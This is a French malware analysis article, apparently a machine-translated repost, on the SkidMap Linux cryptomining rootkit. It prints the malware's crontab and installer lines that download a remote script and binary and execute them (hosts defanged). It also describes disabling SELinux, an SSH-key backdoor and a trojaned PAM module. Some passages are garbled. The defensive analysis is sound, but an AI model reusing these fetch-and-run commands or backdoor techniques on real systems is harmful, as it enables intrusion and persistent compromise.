Comment effectuer une analyse SkidMap des logiciels malveillants Linux

Les logiciels malveillants d’extraction de crypto-monnaie restent une menace répandue. Les cybercriminels explorent également de plus en plus de nouvelles plates-formes et méthodes pour exploiter davantage les logiciels malveillants miniers – depuis les appareils mobiles, les systèmes Unix et de type Unix jusqu'aux serveurs et environnements cloud.

Les attaquants continuent d’améliorer la capacité des logiciels malveillants à résister à la détection. Par exemple, regrouper des logiciels malveillants avec un composant de surveillance pour garantir que les activités illégales d'extraction de cryptomonnaie persistent sur les machines infectées, ou des systèmes basés sur Linux qui utilisent des rootkits basés sur LD_PRELOAD pour rendre leurs composants indisponibles pour le système détecté.

Un malware Linux appelé SkidMap a été récemment découvert, ce qui démontre la tendance aux menaces de minage de cryptomonnaie de plus en plus sophistiquées. Le logiciel malveillant a attiré l'attention car il fonctionne de manière à charger des modules malveillants du noyau, ce qui le rend moins détectable.

Non seulement ces rootkits en mode noyau sont plus difficiles à détecter que les rootkits en mode utilisateur, mais ils peuvent également être utilisés par des attaquants pour accéder aux systèmes affectés. Skidmap a la capacité de définir un mot de passe principal qui lui donne accès à tous les comptes d'utilisateurs du système. De nombreuses routines de SkidMap nécessitent un accès root, et les vecteurs d'attaque utilisés par SkidMap (que ce soit par le biais d'exploits ou de mauvaises configurations) sont probablement les mêmes qui fourniraient à un attaquant un accès root ou administratif au système.

Skidmap infection chain

Le malware s'installe sur la machine cible via crontab comme indiqué ci-dessous :

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

Ensuite, le script d'installation pm.sh télécharge le binaire principal "pc" :

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else
   url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

Execute" PC "Le binaire modifiera les paramètres de sécurité qui affaibliront la machine affectée. Lorsque le fichier /usr/sbin/setenforce existe, le malware peut être exécuté à l'aide de la commande setenforce 0. Si le système dispose d'un fichier /etc/selinux/config, il écrira ces commandes dans le fichier : selinux=disabled et selinux=targeted commands. La première méthode consiste à désactiver la politique selinux ou à empêcher son chargement. La deuxième méthode consiste à configurer le processus spécifié pour qu'il s'exécute dans un domaine restreint.

SkidMap fournit également une porte dérobée en demandant au binaire d'ajouter la clé publique de son gestionnaire au fichierauthorized_keys, qui contient les clés requises pour l'authentification.

SkidMap offre un autre moyen pour un attaquant d'accéder à une machine, autre que l'utilisation d'une porte dérobée. Le malware remplace le fichier pam_unix.so du système (le module responsable de l'authentification Unix standard) par sa propre version malveillante (détectée sous le nom de backdoor.linux.pamdor.a). Comme le montre la figure 2, ce fichier pam_unix.so malveillant accepte un mot de passe spécifique pour n'importe quel utilisateur, permettant à l'attaquant de se connecter sous n'importe quel utilisateur sur l'ordinateur.

SkidMap Cryptocurrency

Le binaire « pc » vérifie si le système d'exploitation du système infecté est Debian ou rhel/centos.

Pour les systèmes basés sur Debian, il dépose la charge utile du mineur de crypto-monnaie dans /tmp/miner2. Pour le système centos/rhel, il téléchargera un fichier tar à partir de l'url hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz qui contient le mineur de crypto-monnaie et ses multiples composants, puis décompressez-le. et installez-le.

Autres composants malveillants de SkidMap

Composants malveillants conçus pour masquer davantage leurs activités malveillantes et garantir qu'ils continuent de s'exécuter :

1 Un faux binaire "rm" : un composant contenu dans le fichier tar est un faux ". rm" rm " fichier binaire, qui remplacera le fichier d'origine (rm est souvent utilisé comme commande pour supprimer des fichiers). Ce fichier configure une tâche cron malveillante qui téléchargera et exécutera un fichier.

Lors de l'installation de kaudited, veuillez installer le fichier /usr/bin/kaudited. Plusieurs modules de noyau chargeables (LKM) sont installés dans ce binaire sur la machine infectée. Pour empêcher les ordinateurs infectés de planter lorsqu'ils rencontrent des rootkits en mode noyau, il utilise différents modules pour des versions spécifiques du noyau. Le binaire kaudited supprime également un composant de surveillance.

3.iproute, ce module accroche l'appel système getdents (généralement utilisé pour lire le contenu d'un répertoire) pour masquer des fichiers spécifiques.

4. netlink, forge le trafic réseau et les statistiques liées au processeur, ce qui rend la charge CPU de la machine infectée toujours très faible.

Solution

SkidMap utilise des méthodes assez avancées pour garantir que lui et ses composants restent inconnus. SkidMap peut accéder aux machines affectées de différentes manières, lui permettant de réinfecter les systèmes déjà récupérés ou nettoyés.

Le minage de cryptomonnaie affecte non seulement les performances des serveurs et des postes de travail, entraînant des dépenses plus élevées, mais peut même perturber les activités. Compte tenu de l'utilisation de Linux dans de nombreux environnements d'entreprise, les utilisateurs et les administrateurs doivent maintenir les systèmes et les serveurs à jour et corrigés ; se méfier des référentiels tiers non vérifiés et empêcher l'exécution de fichiers ou de processus malveillants.

IoCs

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!